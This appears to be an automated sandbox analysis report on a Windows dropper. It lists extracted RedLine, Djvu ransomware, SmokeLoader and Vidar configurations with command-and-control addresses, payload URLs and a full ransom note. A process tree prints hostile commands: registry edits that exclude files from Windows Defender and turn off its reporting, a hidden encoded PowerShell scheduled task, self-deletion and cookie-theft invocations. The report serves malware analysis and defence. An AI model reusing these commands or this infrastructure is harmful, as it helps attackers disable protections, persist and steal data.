Analysis

  • max time kernel
    151s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    14-03-2022 18:24

General

  • Target

    b53d3db4c19620d70a9c5a9d59969965aaaf454a41d394528e7bfe1de94c4adc.exe

  • Size

    3.0MB

  • MD5

    7d742ffed8a42b2e1363202a758ca92a

  • SHA1

    962e2309e3ab501675c9616060508154ba9574b7

  • SHA256

    b53d3db4c19620d70a9c5a9d59969965aaaf454a41d394528e7bfe1de94c4adc

  • SHA512

    eedfb06d0c16264cc311b3a645f3112e593186a30998b7fe7ee99759c0af8bdfdbbab864484f3feda5ed5c3ae1bf626f5f6a60fe37890888b084150455e48cb8

Malware Config

Extracted

Family

redline

Botnet

da da

C2

86.107.197.196:63065

Attributes
  • auth_value

    9b1654b30797c210c85bd0890936a5b9

Extracted

Family

redline

Botnet

ruz876

C2

185.215.113.7:5186

Attributes
  • auth_value

    4750f6742a496bbe74a981d51e7680ad

Extracted

Family

redline

Botnet

nam11

C2

103.133.111.182:44839

Attributes
  • auth_value

    aa901213c47adf1c4bbe06384de2a9ab

Extracted

Family

redline

Botnet

Installs

C2

94.23.1.92:12857

Attributes
  • auth_value

    c8e146507a5c0004dfcc77a7c5f15bc2

Extracted

Family

redline

Botnet

ruzki14_03

C2

176.122.23.55:11768

Attributes
  • auth_value

    13b742acfe493b01c5301781c98d3fbe

Extracted

Family

redline

Botnet

@ywqmre

C2

185.215.113.24:15994

Attributes
  • auth_value

    5a482aa0be2b5e01649fe7a3ce943422

Extracted

Family

redline

Botnet

filinnn1

C2

5.45.77.29:2495

Attributes
  • auth_value

    da347df57c88b125ede510dbe7fcc0f4

Extracted

Family

djvu

C2

http://fuyt.org/test3/get.php

Attributes
  • extension

    .xcbg

  • offline_id

    y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1

  • payload_url

    http://zerit.top/dl/build2.exe

    http://fuyt.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

50.7

Botnet

1177

C2

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes
  • profile_id

    1177

Signatures

  • Detected Djvu ransomware 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 17 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 37 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 11 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 28 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 23 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b53d3db4c19620d70a9c5a9d59969965aaaf454a41d394528e7bfe1de94c4adc.exe
    "C:\Users\Admin\AppData\Local\Temp\b53d3db4c19620d70a9c5a9d59969965aaaf454a41d394528e7bfe1de94c4adc.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1452
    • C:\Users\Admin\AppData\Local\Temp\7zSCA579B3D\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zSCA579B3D\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2456
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c arnatic_2.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4900
        • C:\Users\Admin\AppData\Local\Temp\7zSCA579B3D\arnatic_2.exe
          arnatic_2.exe
          4⤵
            PID:1584
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c arnatic_5.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4940
          • C:\Users\Admin\AppData\Local\Temp\7zSCA579B3D\arnatic_5.exe
            arnatic_5.exe
            4⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2624
            • C:\Users\Admin\Documents\a6IQruP9VdeAQvvxQWSGW7ua.exe
              "C:\Users\Admin\Documents\a6IQruP9VdeAQvvxQWSGW7ua.exe"
              5⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of SetThreadContext
              PID:3640
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:5052
            • C:\Users\Admin\Documents\OK0HJkvrSDN7Lm8wFcgULR0V.exe
              "C:\Users\Admin\Documents\OK0HJkvrSDN7Lm8wFcgULR0V.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3636
            • C:\Users\Admin\Documents\SpY5GvgMQ6w9x4imTwyx2oh0.exe
              "C:\Users\Admin\Documents\SpY5GvgMQ6w9x4imTwyx2oh0.exe"
              5⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Loads dropped DLL
              • Checks processor information in registry
              PID:3644
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im SpY5GvgMQ6w9x4imTwyx2oh0.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\SpY5GvgMQ6w9x4imTwyx2oh0.exe" & del C:\ProgramData\*.dll & exit
                6⤵
                  PID:5328
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im SpY5GvgMQ6w9x4imTwyx2oh0.exe /f
                    7⤵
                    • Kills process with taskkill
                    PID:5476
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 6
                    7⤵
                    • Delays execution with timeout.exe
                    PID:5652
              • C:\Users\Admin\Documents\yJV2HIJssf5MZo09vnjyyFjo.exe
                "C:\Users\Admin\Documents\yJV2HIJssf5MZo09vnjyyFjo.exe"
                5⤵
                • Executes dropped EXE
                • Checks computer location settings
                • Adds Run key to start application
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:960
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c timeout 45
                  6⤵
                    PID:3144
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 45
                      7⤵
                      • Delays execution with timeout.exe
                      PID:1524
                  • C:\Users\Admin\AppData\Local\Temp\Ztfglzprim.exe
                    "C:\Users\Admin\AppData\Local\Temp\Ztfglzprim.exe"
                    6⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:5608
                  • C:\Users\Admin\Documents\yJV2HIJssf5MZo09vnjyyFjo.exe
                    C:\Users\Admin\Documents\yJV2HIJssf5MZo09vnjyyFjo.exe
                    6⤵
                    • Executes dropped EXE
                    PID:5692
                • C:\Users\Admin\Documents\LaGv7wy2CtDJzDdLzZcuGimo.exe
                  "C:\Users\Admin\Documents\LaGv7wy2CtDJzDdLzZcuGimo.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:384
                  • C:\Users\Admin\Documents\LaGv7wy2CtDJzDdLzZcuGimo.exe
                    "C:\Users\Admin\Documents\LaGv7wy2CtDJzDdLzZcuGimo.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:3588
                  • C:\Users\Admin\Documents\LaGv7wy2CtDJzDdLzZcuGimo.exe
                    "C:\Users\Admin\Documents\LaGv7wy2CtDJzDdLzZcuGimo.exe"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2460
                • C:\Users\Admin\Documents\mbHsIju_8qH1VNIG8JGUQ_TE.exe
                  "C:\Users\Admin\Documents\mbHsIju_8qH1VNIG8JGUQ_TE.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:3712
                • C:\Users\Admin\Documents\7JoAu4Z6GvDY4mX_dDUmZHTE.exe
                  "C:\Users\Admin\Documents\7JoAu4Z6GvDY4mX_dDUmZHTE.exe"
                  5⤵
                  • Executes dropped EXE
                  • Checks BIOS information in registry
                  • Checks whether UAC is enabled
                  • Suspicious use of SetThreadContext
                  PID:3064
                • C:\Users\Admin\Documents\p3K_USzjH3LnvWdMF3l0luW3.exe
                  "C:\Users\Admin\Documents\p3K_USzjH3LnvWdMF3l0luW3.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:3844
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\p3K_USzjH3LnvWdMF3l0luW3.exe
                    6⤵
                      PID:5540
                      • C:\Windows\system32\choice.exe
                        choice /C Y /N /D Y /T 0
                        7⤵
                          PID:5296
                    • C:\Users\Admin\Documents\MwHjgF9Ri8kJV1yncWIQpERJ.exe
                      "C:\Users\Admin\Documents\MwHjgF9Ri8kJV1yncWIQpERJ.exe"
                      5⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of SetThreadContext
                      PID:1112
                    • C:\Users\Admin\Documents\663lVl2A_3YBmrcNvQwzUoRz.exe
                      "C:\Users\Admin\Documents\663lVl2A_3YBmrcNvQwzUoRz.exe"
                      5⤵
                      • Executes dropped EXE
                      PID:424
                    • C:\Users\Admin\Documents\q0T7qBXG3GjxoIR2cg6qQHnY.exe
                      "C:\Users\Admin\Documents\q0T7qBXG3GjxoIR2cg6qQHnY.exe"
                      5⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      PID:1252
                    • C:\Users\Admin\Documents\G7RB0oGGhNFLiJcj8VwYHcLU.exe
                      "C:\Users\Admin\Documents\G7RB0oGGhNFLiJcj8VwYHcLU.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:1056
                    • C:\Users\Admin\Documents\199jT6ZQXdo52cB6546oJLbt.exe
                      "C:\Users\Admin\Documents\199jT6ZQXdo52cB6546oJLbt.exe"
                      5⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of SetThreadContext
                      PID:4252
                    • C:\Users\Admin\Documents\d2XkiewfkCIj5uOvYP65zXY6.exe
                      "C:\Users\Admin\Documents\d2XkiewfkCIj5uOvYP65zXY6.exe"
                      5⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      • Loads dropped DLL
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Checks processor information in registry
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3536
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im d2XkiewfkCIj5uOvYP65zXY6.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\d2XkiewfkCIj5uOvYP65zXY6.exe" & del C:\ProgramData\*.dll & exit
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: MapViewOfSection
                        PID:1584
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /im d2XkiewfkCIj5uOvYP65zXY6.exe /f
                          7⤵
                          • Kills process with taskkill
                          PID:1108
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /t 6
                          7⤵
                          • Delays execution with timeout.exe
                          PID:5284
                    • C:\Users\Admin\Documents\QCmlsLhOSF3hyfyYq5n9Q3ta.exe
                      "C:\Users\Admin\Documents\QCmlsLhOSF3hyfyYq5n9Q3ta.exe"
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:4556
                    • C:\Users\Admin\Documents\7MTRqKZgzq2C__jKSw39kNf3.exe
                      "C:\Users\Admin\Documents\7MTRqKZgzq2C__jKSw39kNf3.exe"
                      5⤵
                      • Executes dropped EXE
                      PID:4532
                    • C:\Users\Admin\Documents\MuZWd3hTLODcU7gMD7bzXbn4.exe
                      "C:\Users\Admin\Documents\MuZWd3hTLODcU7gMD7bzXbn4.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4056
                    • C:\Users\Admin\Documents\40fwsnDv5Dk34cB1sLmA4jRZ.exe
                      "C:\Users\Admin\Documents\40fwsnDv5Dk34cB1sLmA4jRZ.exe"
                      5⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of SetThreadContext
                      PID:3952
                    • C:\Users\Admin\Documents\roB0O7JJvbtgcfyIF7y8ThE1.exe
                      "C:\Users\Admin\Documents\roB0O7JJvbtgcfyIF7y8ThE1.exe"
                      5⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      PID:3648
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 1252
                        6⤵
                        • Program crash
                        PID:1092
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 1240
                        6⤵
                        • Program crash
                        PID:5264
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 1240
                        6⤵
                        • Program crash
                        PID:5460
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im "roB0O7JJvbtgcfyIF7y8ThE1.exe" /f & erase "C:\Users\Admin\Documents\roB0O7JJvbtgcfyIF7y8ThE1.exe" & exit
                        6⤵
                          PID:5776
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im "roB0O7JJvbtgcfyIF7y8ThE1.exe" /f
                            7⤵
                            • Kills process with taskkill
                            PID:5904
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 1320
                          6⤵
                          • Program crash
                          PID:5844
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c arnatic_4.exe
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4920
                    • C:\Users\Admin\AppData\Local\Temp\7zSCA579B3D\arnatic_4.exe
                      arnatic_4.exe
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:1284
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        5⤵
                        • Executes dropped EXE
                        PID:4724
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        5⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3196
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c arnatic_3.exe
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4896
                    • C:\Users\Admin\AppData\Local\Temp\7zSCA579B3D\arnatic_3.exe
                      arnatic_3.exe
                      4⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      • Modifies registry class
                      • Suspicious use of WriteProcessMemory
                      PID:1396
                      • C:\Windows\SysWOW64\rUNdlL32.eXe
                        "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                        5⤵
                        • Loads dropped DLL
                        PID:4376
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 600
                          6⤵
                          • Program crash
                          PID:3296
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c arnatic_1.exe
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3420
                    • C:\Users\Admin\AppData\Local\Temp\7zSCA579B3D\arnatic_1.exe
                      arnatic_1.exe
                      4⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      PID:2900
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2900 -s 1600
                        5⤵
                        • Program crash
                        PID:1648
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4376 -ip 4376
                1⤵
                  PID:4328
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 624
                  1⤵
                  • Program crash
                  PID:4752
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c cmd < Detto.xla
                  1⤵
                    PID:828
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd
                      2⤵
                        PID:1708
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                      1⤵
                        PID:2872
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4880
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                        1⤵
                          PID:3584
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                          1⤵
                            PID:1488
                          • C:\Users\Admin\Documents\G7RB0oGGhNFLiJcj8VwYHcLU.exe
                            "C:\Users\Admin\Documents\G7RB0oGGhNFLiJcj8VwYHcLU.exe"
                            1⤵
                            • Executes dropped EXE
                            PID:1484
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 536
                              2⤵
                              • Program crash
                              PID:3952
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3648 -ip 3648
                            1⤵
                              PID:3876
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1484 -ip 1484
                              1⤵
                                PID:1584
                              • C:\Users\Admin\AppData\Local\Temp\7zS92F6.tmp\Install.exe
                                .\Install.exe /S /site_id "525403"
                                1⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks computer location settings
                                • Drops file in System32 directory
                                • Enumerates system info in registry
                                PID:2532
                                • C:\Windows\SysWOW64\forfiles.exe
                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                  2⤵
                                    PID:5400
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                      3⤵
                                        PID:5492
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                          4⤵
                                            PID:5592
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                            4⤵
                                              PID:5692
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                          2⤵
                                            PID:5524
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                              3⤵
                                                PID:5580
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                    PID:5704
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                      PID:5724
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TN "gHnoynYpZ" /SC once /ST 11:22:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                  2⤵
                                                  • Creates scheduled task(s)
                                                  PID:6028
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /run /I /tn "gHnoynYpZ"
                                                  2⤵
                                                    PID:6092
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /DELETE /F /TN "gHnoynYpZ"
                                                    2⤵
                                                      PID:5544
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 20:19:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\gPBpUuc.exe\" j6 /site_id 525403 /S" /V1 /F
                                                      2⤵
                                                      • Drops file in Windows directory
                                                      • Creates scheduled task(s)
                                                      PID:4884
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 424 -ip 424
                                                    1⤵
                                                      PID:760
                                                    • C:\Users\Admin\AppData\Local\Temp\7zS687B.tmp\Install.exe
                                                      .\Install.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      PID:4448
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 432
                                                      1⤵
                                                      • Program crash
                                                      PID:1960
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3648 -ip 3648
                                                      1⤵
                                                        PID:4640
                                                      • C:\Windows\SysWOW64\svchost.exe
                                                        "C:\Windows\System32\svchost.exe"
                                                        1⤵
                                                          PID:1572
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 424 -ip 424
                                                          1⤵
                                                            PID:4388
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 644
                                                            1⤵
                                                            • Program crash
                                                            PID:4300
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 452
                                                            1⤵
                                                            • Program crash
                                                            PID:1168
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3648 -ip 3648
                                                            1⤵
                                                              PID:3792
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2900 -ip 2900
                                                              1⤵
                                                                PID:1584
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 644
                                                                1⤵
                                                                • Program crash
                                                                PID:2220
                                                              • C:\Windows\System32\Conhost.exe
